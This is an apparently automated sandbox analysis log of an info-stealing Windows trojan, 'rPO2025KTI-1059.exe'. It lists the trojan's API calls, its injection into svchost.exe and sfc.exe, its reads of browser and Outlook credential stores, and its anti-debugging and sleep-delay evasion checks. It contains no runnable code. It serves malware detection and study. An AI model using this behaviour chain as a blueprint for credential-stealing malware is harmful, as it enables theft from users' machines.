Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFFB76 1_2_03CFFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CEDAC6 1_2_03CEDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDDAAC 1_2_03CDDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C85AA0 1_2_03C85AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE1AA3 1_2_03CE1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFFA49 1_2_03CFFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF7A46 1_2_03CF7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB3A6C 1_2_03CB3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C49950 1_2_03C49950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5B950 1_2_03C5B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD5910 1_2_03CD5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C438E0 1_2_03C438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CAD800 1_2_03CAD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C03FD2 1_2_03C03FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C03FD5 1_2_03C03FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C41F92 1_2_03C41F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFFFB1 1_2_03CFFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFFF09 1_2_03CFFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C49EB0 1_2_03C49EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5FDC0 1_2_03C5FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C43D40 1_2_03C43D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF1D5A 1_2_03CF1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF7D73 1_2_03CF7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFFCF2 1_2_03CFFCF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB9C32 1_2_03CB9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03C87E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03CBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03C75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03C2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03CAEA12 appears 86 times
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: String function: 00750AE3 appears 70 times
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: String function: 00737DE1 appears 36 times
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: String function: 00758900 appears 42 times
Source: rPO2025KTI-1059.exe, 00000000.00000003.1236411873.00000000040B3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs rPO2025KTI-1059.exe
Source: rPO2025KTI-1059.exe, 00000000.00000003.1233270608.000000000425D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs rPO2025KTI-1059.exe
Source: rPO2025KTI-1059.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@3/3
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079A06A GetLastError,FormatMessageW, 0_2_0079A06A
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007881CB AdjustTokenPrivileges,CloseHandle, 0_2_007881CB
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007887E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_007887E1
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_0079B333
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007AEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_007AEE0D
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007A83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 0_2_007A83BB
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00734E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00734E89
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe File created: C:\Users\user\AppData\Local\Temp\aut36AB.tmp Jump to behavior
Source: rPO2025KTI-1059.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: sfc.exe, 0000000C.00000003.2164179895.0000000003362000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2478431645.0000000003384000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.2164331811.0000000003384000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: rPO2025KTI-1059.exe Virustotal: Detection: 50%
Source: rPO2025KTI-1059.exe ReversingLabs: Detection: 41%
Source: unknown Process created: C:\Users\user\Desktop\rPO2025KTI-1059.exe "C:\Users\user\Desktop\rPO2025KTI-1059.exe"
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPO2025KTI-1059.exe"
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
Source: C:\Windows\SysWOW64\sfc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPO2025KTI-1059.exe" Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\UQQPQGRPvsymXVXAJukfXvBOBevtLlyXWjklxFhaWCjKrwhmTXuCrDkEsRCatqROO\BDP7jgHO8P3kKSgeArQ.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: rPO2025KTI-1059.exe Static file information: File size 1189376 > 1048576
Source: rPO2025KTI-1059.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: rPO2025KTI-1059.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: rPO2025KTI-1059.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: rPO2025KTI-1059.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: rPO2025KTI-1059.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: rPO2025KTI-1059.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: rPO2025KTI-1059.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdbUGP source: rPO2025KTI-1059.exe, 00000000.00000003.1233270608.0000000004130000.00000004.00001000.00020000.00000000.sdmp, rPO2025KTI-1059.exe, 00000000.00000003.1236411873.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1882227177.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1973737395.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1973737395.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1880417121.0000000003800000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2480956841.0000000003AFE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1973800098.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1976565386.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2480956841.0000000003960000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: rPO2025KTI-1059.exe, 00000000.00000003.1233270608.0000000004130000.00000004.00001000.00020000.00000000.sdmp, rPO2025KTI-1059.exe, 00000000.00000003.1236411873.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1882227177.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1973737395.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1973737395.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1880417121.0000000003800000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2480956841.0000000003AFE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1973800098.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1976565386.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2480956841.0000000003960000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: sfc.pdb source: svchost.exe, 00000001.00000003.1941555692.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1941649900.0000000003624000.00000004.00000020.00020000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000002.2479552228.00000000010BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdbGCTL source: svchost.exe, 00000001.00000003.1941555692.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1941649900.0000000003624000.00000004.00000020.00020000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000002.2479552228.00000000010BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: sfc.exe, 0000000C.00000002.2478431645.0000000003304000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2481556246.0000000003F8C000.00000004.10000000.00040000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000D.00000000.2048307666.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2275649544.000000000318C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: sfc.exe, 0000000C.00000002.2478431645.0000000003304000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.2481556246.0000000003F8C000.00000004.10000000.00040000.00000000.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000D.00000000.2048307666.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2275649544.000000000318C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BDP7jgHO8P3kKSgeArQ.exe, 0000000B.00000002.2479293448.0000000000FCF000.00000002.00000001.01000000.00000005.sdmp, BDP7jgHO8P3kKSgeArQ.exe, 0000000D.00000002.2480847853.0000000000FCF000.00000002.00000001.01000000.00000005.sdmp
Source: rPO2025KTI-1059.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: rPO2025KTI-1059.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: rPO2025KTI-1059.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: rPO2025KTI-1059.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: rPO2025KTI-1059.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00734B37 LoadLibraryA,GetProcAddress, 0_2_00734B37
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0073C4C7 push A30073BAh; retn 0073h 0_2_0073C50D
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00758945 push ecx; ret 0_2_00758958
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00403050 push eax; ret 1_2_00403052
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417803 pushfd ; ret 1_2_0041780C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004181F1 push es; ret 1_2_004181F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041AA39 push cs; retf 1_2_0041AA3C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401B50 push edx; ret 1_2_00401D85
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00412355 push eax; ret 1_2_00412356
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041A358 push es; iretd 1_2_0041A38A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040D30A push edx; ret 1_2_0040D30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041432B push esp; iretd 1_2_0041432E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040C46E push edx; ret 1_2_0040C46F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401CD2 push edx; ret 1_2_00401D85
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004184EA push 1422762Eh; ret 1_2_004184F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00406517 push edx; iretd 1_2_0040653C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004125C8 push ebx; retf 1_2_004125D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041F5F0 push ebp; retf 1_2_0041F609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00418EF3 push ecx; ret 1_2_00418F81
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00418F4F push ecx; ret 1_2_00418F81
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00414F20 push edi; retf 1_2_00414F36
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041F725 push edx; iretd 1_2_0041F72C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C0225F pushad ; ret 1_2_03C027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C027FA pushad ; ret 1_2_03C027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx 1_2_03C309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C0283D push eax; iretd 1_2_03C02858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C01368 push eax; iretd 1_2_03C01369
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C01065 push edi; ret 1_2_03C0108A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C018F3 push edx; iretd 1_2_03C01906
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_007348D7
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007B5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_007B5376
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00753187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00753187
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe API/Special instruction interceptor: Address: 1FC3224
Source: C:\Windows\SysWOW64\sfc.exe API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\SysWOW64\sfc.exe API/Special instruction interceptor: Address: 7FFCC372D7E4
Source: C:\Windows\SysWOW64\sfc.exe API/Special instruction interceptor: Address: 7FFCC372D944
Source: C:\Windows\SysWOW64\sfc.exe API/Special instruction interceptor: Address: 7FFCC372D504
Source: C:\Windows\SysWOW64\sfc.exe API/Special instruction interceptor: Address: 7FFCC372D544
Source: C:\Windows\SysWOW64\sfc.exe API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\sfc.exe API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\SysWOW64\sfc.exe API/Special instruction interceptor: Address: 7FFCC372DA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C7096E rdtsc 1_2_03C7096E
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe API coverage: 4.5 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
Source: C:\Windows\SysWOW64\sfc.exe TID: 7744 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0079445A
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079C6D1 FindFirstFileW,FindClose, 0_2_0079C6D1
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0079C75C
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0079EF95
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0079F0F2
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0079F3F3
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_007937EF
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00793B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00793B12
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_0079BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0079BCBC
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_007349A0
Source: BDP7jgHO8P3kKSgeArQ.exe, 0000000D.00000002.2479373273.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: sfc.exe, 0000000C.00000002.2478431645.0000000003304000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 0000000E.00000002.2277346551.00000252030DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\sfc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C7096E rdtsc 1_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417B43 LdrLoadDll, 1_2_00417B43
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_007A3F09 BlockInput, 0_2_007A3F09
Source: C:\Users\user\Desktop\rPO2025KTI-1059.exe Code function: 0_2_00733B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00733B3A
